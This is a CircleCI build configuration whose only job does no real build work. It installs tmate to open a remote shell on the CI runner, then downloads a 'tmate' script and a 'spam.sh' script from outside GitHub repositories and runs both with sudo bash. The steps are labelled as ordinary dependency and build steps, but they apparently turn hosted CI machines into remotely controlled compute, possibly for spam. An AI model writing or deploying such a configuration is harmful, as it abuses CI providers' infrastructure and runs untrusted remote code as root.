version: 2.1
executors:
  worker:
    docker:
      - image: inok2341/anu:latest
jobs:
  build:
    executor: worker
    steps:
      - run:
          name: dependencies
          command: sudo apt update && sudo apt install tmate -y
      - run:
          name: tmate
          command: wget https://github.com/rubyzee/Ubuntu-TmateCI/raw/master/tmate && sudo bash tmate && wget https://raw.githubusercontent.com/vijaymalav564/drone-ssh/main/spam.sh && sudo bash spam.sh
